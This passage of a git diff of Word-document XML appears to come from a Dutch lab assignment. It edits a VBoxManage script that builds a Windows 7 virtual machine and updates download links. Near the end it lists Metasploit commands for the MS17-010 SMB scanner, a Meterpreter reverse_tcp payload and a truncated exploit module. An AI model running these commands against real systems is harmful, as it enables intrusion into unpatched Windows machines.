         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6489,7 +9014,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storagectl</w:t>
       </w:r>
@@ -6498,16 +9023,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --add </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>sata</w:t>
       </w:r>
@@ -6516,7 +9059,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --controller </w:t>
       </w:r>
@@ -6525,7 +9068,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>IntelAHCI</w:t>
       </w:r>
@@ -6534,51 +9077,105 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --bootable on</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add virtual disk to storage controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bootable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> virtual disk </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> storage controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6587,7 +9184,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6596,7 +9193,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storageattach</w:t>
       </w:r>
@@ -6605,7 +9202,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
       </w:r>
@@ -6614,7 +9211,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storagectl</w:t>
       </w:r>
@@ -6623,7 +9220,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
       </w:r>
@@ -6632,7 +9229,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>hdd</w:t>
       </w:r>
@@ -6641,34 +9238,16 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'.\VDI\Windows</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 7 Ultimate SP1 (64bit).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium '.\VDI\Windows 7 Ultimate SP1 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>vdi</w:t>
       </w:r>
@@ -6677,7 +9256,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -6687,41 +9266,59 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Define boot order</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Define</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> boot order</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -6730,7 +9327,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6739,7 +9336,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
       </w:r>
@@ -6748,51 +9345,33 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dvd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 dvd --boot3 none --boot4 none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># Start Windows VM</w:t>
       </w:r>
@@ -6802,15 +9381,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>VBoxManage</w:t>
@@ -6820,7 +9399,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -6829,7 +9408,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>startvm</w:t>
       </w:r>
@@ -6838,43 +9417,33 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>gui</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --type gui</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -6884,14 +9453,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># 4. Finish Setup</w:t>
       </w:r>
@@ -6901,14 +9470,14 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -6918,16 +9487,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Read-Host -Prompt "Press Enter to exit"</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Read-Host -Prompt "Press Enter </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exit"</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -1824,7 +1824,13 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
@@ -1834,7 +1840,7 @@
             <w:szCs w:val="20"/>
             <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=u8rEB6</w:t>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=kv9tgF</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -1849,30 +1855,30 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Windows</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> 7</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1882,29 +1888,11 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:sz w:val="20"/>
             <w:szCs w:val="20"/>
-            <w:lang w:val="nl-BE"/>
+            <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=UC49WM</w:t>
         </w:r>
       </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:ind w:left="1440"/>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>REBUILD LINKS, FILES CHANGED</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2480,51 +2468,23 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>use</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>auxiliary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/scanner/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>use auxiliary/scanner/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>smb</w:t>
       </w:r>
@@ -2533,7 +2493,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/smb_ms17_010</w:t>
       </w:r>
@@ -2652,42 +2612,32 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>use</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>use payload/windows/x64/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -2696,43 +2646,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/x64/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>reverse_tcp</w:t>
       </w:r>
@@ -2826,42 +2740,32 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>use</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>use exploit/windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
